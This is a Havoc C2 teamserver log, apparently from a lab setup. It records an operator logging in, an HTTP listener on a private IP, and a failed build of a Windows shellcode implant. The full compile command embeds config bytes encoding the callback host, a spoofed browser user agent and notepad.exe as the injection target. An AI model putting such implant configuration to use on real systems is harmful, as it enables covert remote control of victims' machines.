Havoc/data/loot/2024.07.12._06_48_26/teamserver.log
              _______           _______  _______ 
    │\     /│(  ___  )│\     /│(  ___  )(  ____ \
    │ )   ( ││ (   ) ││ )   ( ││ (   ) ││ (    \/
    │ (___) ││ (___) ││ │   │ ││ │   │ ││ │      
    │  ___  ││  ___  │( (   ) )│ │   │ ││ │      
    │ (   ) ││ (   ) │ \ \_/ / │ │   │ ││ │      
    │ )   ( ││ )   ( │  \   /  │ (___) ││ (____/\
    │/     \││/     \│   \_/   (_______)(_______/

  	 pwn and elevate until it's done

[06:48:26] [DBUG] [cmd.init.func2:59]: Debug mode enabled
[06:48:26] [INFO] Havoc Framework [Version: 0.7] [CodeName: Bites The Dust]
[06:48:26] [INFO] Havoc profile: ./profiles/havoc.yaotl
[06:48:26] [INFO] Build: 
 - Compiler x64 : data/x86_64-w64-mingw32-cross/bin/x86_64-w64-mingw32-gcc
 - Compiler x86 : data/i686-w64-mingw32-cross/bin/i686-w64-mingw32-gcc
 - Nasm         : /usr/bin/nasm
[06:48:26] [INFO] Time: 12/07/2024 06:48:26
[06:48:26] [INFO] Teamserver logs saved under: data/loot/2024.07.12._06:48:26
[06:48:26] [DBUG] [server.(*Teamserver).Start:53]: Starting teamserver...
[06:48:26] [INFO] Starting Teamserver on wss://0.0.0.0:40056
[06:48:26] [INFO] [SERVICE] starting service handle on wss://0.0.0.0:40056/service-endpoint
[06:48:26] [INFO] Opens existing database: data/teamserver.db
[06:48:26] [DBUG] [certs.HTTPSGenerateRSACertificate:301]: Generating TLS certificate (RSA) for '0.0.0.0' ...
[06:48:26] [INFO] Starting 1 listeners from last session
[06:48:26] [DBUG] [handlers.(*HTTP).Start:204]: Setup HTTP/s Server
[06:48:26] [INFO] Started "1" listener: http://192.168.17.137:80
[06:48:26] [INFO] Restored 2 agents from last session
[06:48:26] [DBUG] [server.(*Teamserver).Start:492]: Wait til the server shutdown
[06:48:26] [DBUG] [certs.generateCertificate:223]: Valid from 2023-08-26 06:48:26.086296317 -0400 EDT to 2026-08-25 06:48:26.086296317 -0400 EDT
[06:48:26] [DBUG] [certs.generateCertificate:228]: Serial Number: 47935442554213390015600871656280416560
[06:48:26] [DBUG] [certs.generateCertificate:234]: Authority certificate
[06:48:26] [DBUG] [certs.generateCertificate:247]: ExtKeyUsage = [1 2]
[06:48:26] [DBUG] [certs.generateCertificate:263]: Certificate authenticates IP address: 0.0.0.0
[06:48:26] [DBUG] [certs.generateCertificate:278]: Certificate is an AUTHORITY
[06:48:28] [DBUG] [server.(*Teamserver).ClientAuthenticate:658]: Found User: 5pider
[06:48:28] [DBUG] [server.(*Teamserver).ClientAuthenticate:665]: User 5pider is authenticated
[06:48:28] [GOOD] User <5pider> Authenticated
[06:48:33] [DBUG] [builder.NewBuilder:179]: Payload Builder: Enable Debug Mode false
[06:48:33] [DBUG] [server.(*Teamserver).DispatchEvent.func18:882]: Windows Shellcode
[06:48:33] [DBUG] [builder.(*Builder).PatchConfig:579]: map[Amsi/Etw Patch:None Indirect Syscall:false Injection:map[Alloc:Native/Syscall Execute:Native/Syscall Spawn32:C:\Windows\SysWOW64\notepad.exe Spawn64:C:\Windows\System32\notepad.exe] Jitter:15 Proxy Loading:None (LdrLoadDll) Sleep:2 Sleep Jmp Gadget:None Sleep Technique:WaitForSingleObjectEx Stack Duplication:false]
[06:48:33] [DBUG] [builder.(*Builder).PatchConfig:915]: Host => 192.168.17.137
[06:48:33] [DBUG] [builder.(*Builder).PatchConfig:940]: host only
[06:48:33] [DBUG] [builder.(*Builder).PatchConfig:971]: 
[06:48:33] [DBUG] [builder.(*Builder).PatchConfig:982]: 
[06:48:33] [DBUG] [builder.(*Builder).Build:331]: /usr/bin/nasm -f win64 src/asm/Spoof.x64.asm -o /tmp/c69ddd9554/afdfe2a5a8.o
[06:48:33] [DBUG] [builder.(*Builder).Build:331]: /usr/bin/nasm -f win64 src/asm/Syscall.x64.asm -o /tmp/c69ddd9554/e572149945.o
[06:48:33] [DBUG] [builder.(*Builder).Build:389]: Compile dll and prepend shellcode to it.
[06:48:33] [DBUG] [builder.NewBuilder:179]: Payload Builder: Enable Debug Mode false
[06:48:33] [DBUG] [builder.(*Builder).SetPatchConfig:465]: Set Patch config from Profile
[06:48:33] [DBUG] [builder.(*Builder).PatchConfig:579]: map[Amsi/Etw Patch:None Indirect Syscall:false Injection:map[Alloc:Native/Syscall Execute:Native/Syscall Spawn32:C:\Windows\SysWOW64\notepad.exe Spawn64:C:\Windows\System32\notepad.exe] Jitter:15 Proxy Loading:None (LdrLoadDll) Sleep:2 Sleep Jmp Gadget:None Sleep Technique:WaitForSingleObjectEx Stack Duplication:false]
[06:48:33] [DBUG] [builder.(*Builder).PatchConfig:915]: Host => 192.168.17.137
[06:48:33] [DBUG] [builder.(*Builder).PatchConfig:940]: host only
[06:48:33] [DBUG] [builder.(*Builder).PatchConfig:971]: 
[06:48:33] [DBUG] [builder.(*Builder).PatchConfig:982]: 
[06:48:33] [DBUG] [builder.(*Builder).Build:331]: /usr/bin/nasm -f win64 src/asm/Spoof.x64.asm -o /tmp/1b2284a7bd/9f2f2e6870.o
[06:48:33] [DBUG] [builder.(*Builder).Build:331]: /usr/bin/nasm -f win64 src/asm/Syscall.x64.asm -o /tmp/1b2284a7bd/cb4bee0997.o
[06:48:33] [DBUG] [builder.(*Builder).Build:379]: Compile dll
[06:49:28] [ERRO] Couldn't compile implant: exit status 1
[06:49:28] [DBUG] [builder.(*Builder).Cmd:1083]: "/home/kali/4havoc/Havoc/data/x86_64-w64-mingw32-cross/bin/x86_64-w64-mingw32-gcc" src/core/CoffeeLdr.c src/core/Command.c src/core/Dotnet.c src/core/Download.c src/core/HwBpEngine.c src/core/HwBpExceptions.c src/core/Jobs.c src/core/Kerberos.c src/core/Memory.c src/core/MiniStd.c src/core/Obf.c src/core/ObjectApi.c src/core/Package.c src/core/Parser.c src/core/Pivot.c src/core/Runtime.c src/core/Socket.c src/core/Spoof.c src/core/SysNative.c src/core/Syscalls.c src/core/Thread.c src/core/Token.c src/core/Transport.c src/core/TransportHttp.c src/core/TransportSmb.c src/core/Win32.c src/crypt/AesCrypt.c src/inject/Inject.c src/inject/InjectUtil.c /tmp/1b2284a7bd/9f2f2e6870.o /tmp/1b2284a7bd/cb4bee0997.o src/Demon.c -Iinclude  -nostdlib -mwindows -Os -fno-asynchronous-unwind-tables -masm=intel -fno-ident -fpack-struct=8 -falign-functions=1 -s -ffunction-sections -fdata-sections -falign-jumps=1 -w -falign-labels=1 -fPIC -Wl,-s,--no-seh,--enable-stdcall-fixup,--gc-sections -DSHELLCODE  -DCONFIG_BYTES={0x02\,0x00\,0x00\,0x00\,0x0f\,0x00\,0x00\,0x00\,0x02\,0x00\,0x00\,0x00\,0x02\,0x00\,0x00\,0x00\,0x40\,0x00\,0x00\,0x00\,0x43\,0x00\,0x3a\,0x00\,0x5c\,0x00\,0x57\,0x00\,0x69\,0x00\,0x6e\,0x00\,0x64\,0x00\,0x6f\,0x00\,0x77\,0x00\,0x73\,0x00\,0x5c\,0x00\,0x53\,0x00\,0x79\,0x00\,0x73\,0x00\,0x74\,0x00\,0x65\,0x00\,0x6d\,0x00\,0x33\,0x00\,0x32\,0x00\,0x5c\,0x00\,0x6e\,0x00\,0x6f\,0x00\,0x74\,0x00\,0x65\,0x00\,0x70\,0x00\,0x61\,0x00\,0x64\,0x00\,0x2e\,0x00\,0x65\,0x00\,0x78\,0x00\,0x65\,0x00\,0x00\,0x00\,0x40\,0x00\,0x00\,0x00\,0x43\,0x00\,0x3a\,0x00\,0x5c\,0x00\,0x57\,0x00\,0x69\,0x00\,0x6e\,0x00\,0x64\,0x00\,0x6f\,0x00\,0x77\,0x00\,0x73\,0x00\,0x5c\,0x00\,0x53\,0x00\,0x79\,0x00\,0x73\,0x00\,0x57\,0x00\,0x4f\,0x00\,0x57\,0x00\,0x36\,0x00\,0x34\,0x00\,0x5c\,0x00\,0x6e\,0x00\,0x6f\,0x00\,0x74\,0x00\,0x65\,0x00\,0x70\,0x00\,0x61\,0x00\,0x64\,0x00\,0x2e\,0x00\,0x65\,0x00\,0x78\,0x00\,0x65\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x0a\,0x00\,0x00\,0x00\,0x50\,0x00\,0x4f\,0x00\,0x53\,0x00\,0x54\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x01\,0x00\,0x00\,0x00\,0x1e\,0x00\,0x00\,0x00\,0x31\,0x00\,0x39\,0x00\,0x32\,0x00\,0x2e\,0x00\,0x31\,0x00\,0x36\,0x00\,0x38\,0x00\,0x2e\,0x00\,0x31\,0x00\,0x37\,0x00\,0x2e\,0x00\,0x31\,0x00\,0x33\,0x00\,0x37\,0x00\,0x00\,0x00\,0x50\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0xdc\,0x00\,0x00\,0x00\,0x4d\,0x00\,0x6f\,0x00\,0x7a\,0x00\,0x69\,0x00\,0x6c\,0x00\,0x6c\,0x00\,0x61\,0x00\,0x2f\,0x00\,0x35\,0x00\,0x2e\,0x00\,0x30\,0x00\,0x20\,0x00\,0x28\,0x00\,0x57\,0x00\,0x69\,0x00\,0x6e\,0x00\,0x64\,0x00\,0x6f\,0x00\,0x77\,0x00\,0x73\,0x00\,0x20\,0x00\,0x4e\,0x00\,0x54\,0x00\,0x20\,0x00\,0x36\,0x00\,0x2e\,0x00\,0x31\,0x00\,0x3b\,0x00\,0x20\,0x00\,0x57\,0x00\,0x4f\,0x00\,0x57\,0x00\,0x36\,0x00\,0x34\,0x00\,0x29\,0x00\,0x20\,0x00\,0x41\,0x00\,0x70\,0x00\,0x70\,0x00\,0x6c\,0x00\,0x65\,0x00\,0x57\,0x00\,0x65\,0x00\,0x62\,0x00\,0x4b\,0x00\,0x69\,0x00\,0x74\,0x00\,0x2f\,0x00\,0x35\,0x00\,0x33\,0x00\,0x37\,0x00\,0x2e\,0x00\,0x33\,0x00\,0x36\,0x00\,0x20\,0x00\,0x28\,0x00\,0x4b\,0x00\,0x48\,0x00\,0x54\,0x00\,0x4d\,0x00\,0x4c\,0x00\,0x2c\,0x00\,0x20\,0x00\,0x6c\,0x00\,0x69\,0x00\,0x6b\,0x00\,0x65\,0x00\,0x20\,0x00\,0x47\,0x00\,0x65\,0x00\,0x63\,0x00\,0x6b\,0x00\,0x6f\,0x00\,0x29\,0x00\,0x20\,0x00\,0x43\,0x00\,0x68\,0x00\,0x72\,0x00\,0x6f\,0x00\,0x6d\,0x00\,0x65\,0x00\,0x2f\,0x00\,0x39\,0x00\,0x36\,0x00\,0x2e\,0x00\,0x30\,0x00\,0x2e\,0x00\,0x34\,0x00\,0x36\,0x00\,0x36\,0x00\,0x34\,0x00\,0x2e\,0x00\,0x31\,0x00\,0x31\,0x00\,0x30\,0x00\,0x20\,0x00\,0x53\,0x00\,0x61\,0x00\,0x66\,0x00\,0x61\,0x00\,0x72\,0x00\,0x69\,0x00\,0x2f\,0x00\,0x35\,0x00\,0x33\,0x00\,0x37\,0x00\,0x2e\,0x00\,0x33\,0x00\,0x36\,0x00\,0x00\,0x00\,0x01\,0x00\,0x00\,0x00\,0x02\,0x00\,0x00\,0x00\,0x00\,0x00\,0x01\,0x00\,0x00\,0x00\,0x02\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00\,0x00}  -DTR
ANSPORT_HTTP -shared -e DllMain src/main/MainDll.c -o /tmp/1b2284a7bd/demon.x64.dll
[06:49:28] [DBUG] [builder.(*Builder).Cmd:1084]: StdErr:
src/core/Syscalls.c: In function ‘SysInitialize’:
src/core/Syscalls.c:23:75: error: ‘XOR_KEY’ undeclared (first use in this function)
   23 |     if ( ( SysNativeFunc = LdrFunctionAddr( Ntdll, (H_FUNC_NTADDBOOTENTRY^XOR_KEY) ) ) )
      |                                                                           ^~~~~~~
src/core/Syscalls.c:23:75: note: each undeclared identifier is reported only once for each function it appears in

